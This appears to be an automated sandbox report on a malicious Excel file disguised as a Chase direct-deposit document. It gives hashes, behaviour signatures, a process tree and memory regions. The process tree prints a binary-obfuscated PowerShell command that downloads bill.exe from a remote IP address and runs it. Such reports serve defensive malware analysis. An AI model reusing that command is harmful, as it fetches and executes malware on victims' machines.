Analysis
-
max time kernel
1061s -
max time network
677s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
25-08-2021 16:19
Static task
static1
Behavioral task
behavioral1
Sample
Chase Direct Deposit.xls
Resource
win7v20210408
Behavioral task
behavioral2
Sample
Chase Direct Deposit.xls
Resource
win10v20210410
General
-
Target
Chase Direct Deposit.xls
-
Size
116KB
-
MD5
89da2874a518638c7f5ec30a286f4167
-
SHA1
c766aba3be2f450a8059b4754fed706730321f4d
-
SHA256
4816d1e51c489e591d7d3d9aeba4cb7a494a97f27bba7a90d45bbe0e1b85a829
-
SHA512
390e3e89026436fff0fa646cc111df980cc5f5ef29b4c3ee1f857de426e643d10bf77f469424ab17a500dd8b575d62af5dea34d42c36a6ab905674c04797c21d
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3188 4020 powershell.exe EXCEL.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 16 3188 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
bill.exebill.exepid process 3500 bill.exe 1680 bill.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4540 1680 WerFault.exe bill.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 4020 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exeWerFault.exepid process 3188 powershell.exe 3188 powershell.exe 3188 powershell.exe 4540 WerFault.exe 4540 WerFault.exe 4540 WerFault.exe 4540 WerFault.exe 4540 WerFault.exe 4540 WerFault.exe 4540 WerFault.exe 4540 WerFault.exe 4540 WerFault.exe 4540 WerFault.exe 4540 WerFault.exe 4540 WerFault.exe 4540 WerFault.exe 4540 WerFault.exe 4540 WerFault.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exeWerFault.exedescription pid process Token: SeDebugPrivilege 3188 powershell.exe Token: SeRestorePrivilege 4540 WerFault.exe Token: SeBackupPrivilege 4540 WerFault.exe Token: SeDebugPrivilege 4540 WerFault.exe -
Suspicious use of SetWindowsHookEx 30 IoCs
Processes:
EXCEL.EXEpid process 4020 EXCEL.EXE 4020 EXCEL.EXE 4020 EXCEL.EXE 4020 EXCEL.EXE 4020 EXCEL.EXE 4020 EXCEL.EXE 4020 EXCEL.EXE 4020 EXCEL.EXE 4020 EXCEL.EXE 4020 EXCEL.EXE 4020 EXCEL.EXE 4020 EXCEL.EXE 4020 EXCEL.EXE 4020 EXCEL.EXE 4020 EXCEL.EXE 4020 EXCEL.EXE 4020 EXCEL.EXE 4020 EXCEL.EXE 4020 EXCEL.EXE 4020 EXCEL.EXE 4020 EXCEL.EXE 4020 EXCEL.EXE 4020 EXCEL.EXE 4020 EXCEL.EXE 4020 EXCEL.EXE 4020 EXCEL.EXE 4020 EXCEL.EXE 4020 EXCEL.EXE 4020 EXCEL.EXE 4020 EXCEL.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
EXCEL.EXEpowershell.exebill.exedescription pid process target process PID 4020 wrote to memory of 3188 4020 EXCEL.EXE powershell.exe PID 4020 wrote to memory of 3188 4020 EXCEL.EXE powershell.exe PID 3188 wrote to memory of 3500 3188 powershell.exe bill.exe PID 3188 wrote to memory of 3500 3188 powershell.exe bill.exe PID 3188 wrote to memory of 3500 3188 powershell.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe PID 3500 wrote to memory of 1680 3500 bill.exe bill.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Chase Direct Deposit.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v78df0=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,00100000,01001110,01100101,01110100,00101110,01010111,01100101,00100111,00111011,00100000,00100100,01100010,00110100,01100100,01100110,00111101,00100111,01100010,01000011,01101100,00100111,00100000,00101011,00100000,00100111,01101001,01100101,01101110,01110100,00101001,00101110,01000100,01101111,01110111,01101110,01101100,01101111,00100111,00111011,00100000,00100100,01100011,00110011,00111101,00100111,01100001,01100100,01000110,01101001,01101100,01100101,00101000,00100111,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,00110001,00111001,00111000,00101110,00110010,00110011,00101110,00110010,00110101,00110001,00101110,00110001,00110001,00110000,00101111,01100010,01101001,01101100,01101100,00101110,01100101,01111000,01100101,00100111,00100111,00101100,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100111,00100111,01011100,01100010,01101001,01101100,01101100,00101110,01100101,01111000,01100101,00100111,00100111,00101001,00100111,00111011,00111011,00100100,01010100,01000011,00111101,00100100,01110111,01100101,00110010,00110010,00101100,00100100,01100010,00110100,01100100,01100110,00101100,00100100,01100011,00110011,00100000,00101101,01001010,01101111,01101001,01101110,00100000,00100111,00100111,00111011,01001001,01000101,01011000,00101000,00100100,01010100,01000011,00101001,00111011,01110011,01110100,01100001,01110010,01110100,00101101,01110000,01110010,01101111,01100011,01100101,01110011,01110011,00101000,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100000,00100111,01011100,01100010,01101001,01101100,01101100,00101110,01100101,01111000,01100101,00100111,00101001) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };[system.String]::Join('', $v78df0)|IEX2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\bill.exe"C:\Users\Admin\AppData\Local\Temp\bill.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\bill.exeC:\Users\Admin\AppData\Local\Temp\bill.exe4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1680 -s 5405⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\bill.exeMD5
27ee757d743631d49dcb3c6d7c90dfbe
SHA12b356d2090ea481e38fdf1e78dac05b74c4818f0
SHA256dc1bb96ddee60e15d3344fc4b0413634a54974ef9e854628157800c9d695f028
SHA512871222583adde8b8f469dba61dfa8a25df04d7c3f9eb3867441928898df7c7bc92ecaa6aa8619d78c604589637670d4f732294d574a748aa9fdf0294aeff08e1
-
C:\Users\Admin\AppData\Local\Temp\bill.exeMD5
27ee757d743631d49dcb3c6d7c90dfbe
SHA12b356d2090ea481e38fdf1e78dac05b74c4818f0
SHA256dc1bb96ddee60e15d3344fc4b0413634a54974ef9e854628157800c9d695f028
SHA512871222583adde8b8f469dba61dfa8a25df04d7c3f9eb3867441928898df7c7bc92ecaa6aa8619d78c604589637670d4f732294d574a748aa9fdf0294aeff08e1
-
C:\Users\Admin\AppData\Local\Temp\bill.exeMD5
27ee757d743631d49dcb3c6d7c90dfbe
SHA12b356d2090ea481e38fdf1e78dac05b74c4818f0
SHA256dc1bb96ddee60e15d3344fc4b0413634a54974ef9e854628157800c9d695f028
SHA512871222583adde8b8f469dba61dfa8a25df04d7c3f9eb3867441928898df7c7bc92ecaa6aa8619d78c604589637670d4f732294d574a748aa9fdf0294aeff08e1
-
memory/1680-317-0x00000000001C0000-0x00000000001C1000-memory.dmpFilesize
4KB
-
memory/1680-312-0x0000000000000000-mapping.dmp
-
memory/1680-318-0x0000000000030000-0x0000000000031000-memory.dmpFilesize
4KB
-
memory/1680-319-0x0000000000600000-0x000000000074A000-memory.dmpFilesize
1.3MB
-
memory/3188-292-0x000001A2B9783000-0x000001A2B9785000-memory.dmpFilesize
8KB
-
memory/3188-276-0x0000000000000000-mapping.dmp
-
memory/3188-286-0x000001A2B9750000-0x000001A2B9751000-memory.dmpFilesize
4KB
-
memory/3188-289-0x000001A2B9A10000-0x000001A2B9A11000-memory.dmpFilesize
4KB
-
memory/3188-293-0x000001A2B9786000-0x000001A2B9788000-memory.dmpFilesize
8KB
-
memory/3188-291-0x000001A2B9780000-0x000001A2B9782000-memory.dmpFilesize
8KB
-
memory/3500-310-0x0000000000510000-0x000000000065A000-memory.dmpFilesize
1.3MB
-
memory/3500-306-0x0000000000000000-mapping.dmp
-
memory/3500-314-0x0000000010410000-0x000000001042B000-memory.dmpFilesize
108KB
-
memory/4020-290-0x0000025371640000-0x0000025371644000-memory.dmpFilesize
16KB
-
memory/4020-123-0x000002535D450000-0x000002535F345000-memory.dmpFilesize
31.0MB
-
memory/4020-121-0x00007FF8E9220000-0x00007FF8EA30E000-memory.dmpFilesize
16.9MB
-
memory/4020-114-0x00007FF69DE00000-0x00007FF6A13B6000-memory.dmpFilesize
53.7MB
-
memory/4020-122-0x00007FF8C8B00000-0x00007FF8C8B10000-memory.dmpFilesize
64KB
-
memory/4020-118-0x00007FF8C8B00000-0x00007FF8C8B10000-memory.dmpFilesize
64KB
-
memory/4020-117-0x00007FF8C8B00000-0x00007FF8C8B10000-memory.dmpFilesize
64KB
-
memory/4020-116-0x00007FF8C8B00000-0x00007FF8C8B10000-memory.dmpFilesize
64KB
-
memory/4020-115-0x00007FF8C8B00000-0x00007FF8C8B10000-memory.dmpFilesize
64KB